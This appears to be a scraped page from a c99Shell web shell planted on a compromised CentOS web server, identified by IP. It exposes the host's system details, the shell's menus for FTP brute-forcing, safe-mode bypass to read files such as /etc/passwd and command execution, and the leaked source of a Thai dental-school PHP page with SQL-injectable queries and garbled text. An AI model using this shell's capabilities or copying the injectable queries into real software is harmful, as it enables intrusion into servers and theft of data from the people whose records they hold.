110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/teacher_aj_viratt/Dentist/ drwxr-xr-x Free 52.41 GB of 127.8 GB (41.01%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php

 session_start();

if (session_is_registered("valid_user"))

{

$Username = $valid_user;

include("../../include/FunctionDB.php"); 

include("./header.php");

ConnectDB();

$sql = "SELECT * FROM  account  Where   Teacher_code='$Teacher_code'  GROUP By  Date ";

$result = mysql_query($sql);

$num = mysql_num_rows($result);



?> 

<html>

<head>

<title>Display  List</title>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874">

<link href="../../css/style1.css" rel="stylesheet" type="text/css">

<style type="text/css">

<!--

.style6 {color: #003333}

-->

</style>

</head>

<body bgcolor="#F2FCED">

<table width="100%" border="0" cellspacing="0" cellpadding="0">

  <tr> 

    <td>&nbsp;</td>

  </tr>

</table>

<table width="60%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#999999" style="background-color:#eeeeee; border:1px solid gray"size="12">

  <tr> 

    <td height="25" colspan="4"  background="../Image/bdevel.jpg"> <div align="center"><font color="#993333" size="4" face="Tahoma"><strong>бКґ§ўйНБЩЕЎТГа§Ф№ГТВЗС№</strong></font><font size="4" face="Tahoma"><strong>

</strong></font></div></td>

  </tr>

  <tr bgcolor="#CCCCCC"> 

    <td width="6%" bordercolor="#999966" style="border:1px solid gray">

<div align="center"><strong><font color="#000000" size="2" face="Tahoma">No.</font></strong></div></td>

    <td width="14%" bordercolor="#999966" style="border:1px solid gray">

<div align="center"><strong><font size="2" face="Tahoma">ЗС№·Хи</font></strong></div></td>

    <td width="50%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">·С№µбѕ·Вм</font></strong></div></td>

    <td width="30%" bordercolor="#999966" style="border:1px solid gray"><div align="center"><strong><font size="2" face="Tahoma">ЁУ№З№ГТВЎТГ·Сй§ЛБґ /ЗС№</font></strong></div></td>

  </tr>

  <?php

$i = 1;

 while($row = mysql_fetch_array($result))

 {



     if($count==0)

     {

?>

  <tr > 

    <td align=center bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma"> 

      <?=$i?>

      </font></strong></td>

    <td align=center bgcolor="#F7F7F7" >      <font color="#996600" size="2" face="Tahoma"><a href="FrmDentisday.php?Date=<?=$row["Date"]?>&&Teacher_code=<?= $row["Teacher_code"] ?>"title="Click to see Detail" class="d">

      <strong>

      <?=$row["Date"]?>

      </strong></a></font><strong></a></font></strong>

            </strong>      

    <td align=center bgcolor="#F7F7F7" ><div align="left"><font color="#996600" size="2" face="Tahoma"> <a href="FrmDentisday.php?Dedtis_code=<?=$row["Dentis_code"]?>&&Date=<?= $row["Date"] ?>"title="Click to see Detail" class="d"> </a></font><font color="#003366" size="2" face="Tahoma"><span class="style9"><font color="#003366" size="2" face="Tahoma"><font size="2" face="Tahoma"><a href="Planteachdetail.php?No_code=<?=$row["No_code"]?>"title="¤ЕФЎґЩаѕЧиНѕФБѕмгєГТВЎТГ¤иТгЄйЁиТВ " class="d" > </a><span class="d style3"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><span class="style6"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

    <?php

         $Teacher_code =  $row["Teacher_code"];

         $sql = "Select * From personal_tb Where Teacher_code='$Teacher_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[First_name] $rss[Teacher_name] $rss[Teacher_lastname]";

         ?>

    </font></font></font></font></font></font></font></span></font>

      </font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></span></font></font></span></font></div>

    <td align=center bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">

    <?php

    $Date = $row[Date];

    $sql2 = "Select * From  account  Where  Date='$Date'  and  Teacher_code='$Teacher_code' ";

    $result2 = mysql_query($sql2);

    $countnum = mysql_num_rows($result2);

     echo $countnum;

    

    ?>

</font></strong></td>

  </tr>

  <?

    $count=1;

     }

else

{

?>

  <tr> 

    <td align="center" bordercolor="#999966" bgcolor="#FFFFFF" ><font color="#996600" size="2" face="Tahoma"><?=$i?>

      </font></td>

    <td height="18" align="center" bgcolor="#FFFFFF" ><strong><font color="#990099" size="2" face="Tahoma"><a href="MonnyList.php?Start_year=<?=$row["Start_year"]?>&&Start_mont=<?=$row["Start_mont"]?>"title="Click to see Detail" class="d">

    </a></font><font color="#996600" size="2" face="Tahoma">

<a href="FrmDentisday.php?Date=<?=$row["Date"]?>&&Teacher_code=<?= $row["Teacher_code"] ?>"title="Click to see Detail" class="d">

<?=$row["Date"]?>

</a></a>

</a><a href="FrmDentisday.php?Date=<?=$row["Date"]?>&&Teacher_code=<?= $row["Teacher_code"] ?>"title="Click to see Detail" class="d">

</a></font></strong></td>

    <td align="center" bgcolor="#FFFFFF" ><div align="left"><font color="#996600" size="2" face="Tahoma"> <a href="FrmDentiscode.php?Teach_id=<?=$row["Teach_id"]?>&&Dentis_code=<?=$row["Dentis_code"]?>"title="Click to see Detail" class="d"> </a><a href="FrmDentiscode.php?Dedtis_code=<?=$row["Dentis_code"]?>&&Date=<?= $row["Date"] ?>"title="Click to see Detail" class="d"> </a></font><font size="2" face="Tahoma"><span class="d style3"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"> <font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"> </font><font color="#996600" size="2" face="Tahoma"><a href="FrmDentisday.php?Dedtis_code=<?=$row["Dentis_code"]?>&&Date=<?= $row["Date"] ?>"title="Click to see Detail" class="d"> </a></font><font size="2" face="Tahoma"><font size="2" face="Tahoma"><span class="style6"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma"><font size="2" face="Tahoma">

      <?php

         $Teacher_code =  $row["Teacher_code"];

         $sql = "Select * From personal_tb Where Teacher_code='$Teacher_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[First_name] $rss[Teacher_name] $rss[Teacher_lastname]";

         ?>

    </font></font></font></font></font></font></font></span></font>

    </font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font> </font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></font></span></font></div></td>

    <td align="center" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">

      <?php

    $Date = $row[Date];

    $sql2 = "Select * From  account  Where  Date='$Date'  and Dentis_code='$Dentis_code' ";

    $result2 = mysql_query($sql2);

    $countnum = mysql_num_rows($result2);

     echo $countnum;

    

    ?>

</font></strong></td>

  </tr>

  <?

$count=0;

}

$i++;

 }    



?>

  <tr> 

    <td height="25" colspan="4" align="center" background="../Image/bdevel.jpg"> 

      <div align="center"><strong><font color="#000000" size="2" face="Tahoma">·Сй§ЛБґ</font><font color="#993333" size="2" face="Tahoma"> 

        <? echo $num ?></font> <font color="#000000" size="2" face="Tahoma">ЗС№</font> </strong></div></td>

</table>

<p>&nbsp;</p>

</html>

<? 

CloseDB();

?>

<?php 

    }

else

{

    echo"<body bgcolor=\"#CCCCCC\">";

     echo"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";

     echo"<center>";

      echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";

      echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";

      echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> ¤ШідБиБКФ·ёмгЄй§Т№</font>";

      echo"</center>";

      echo"</body>";

} 

?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: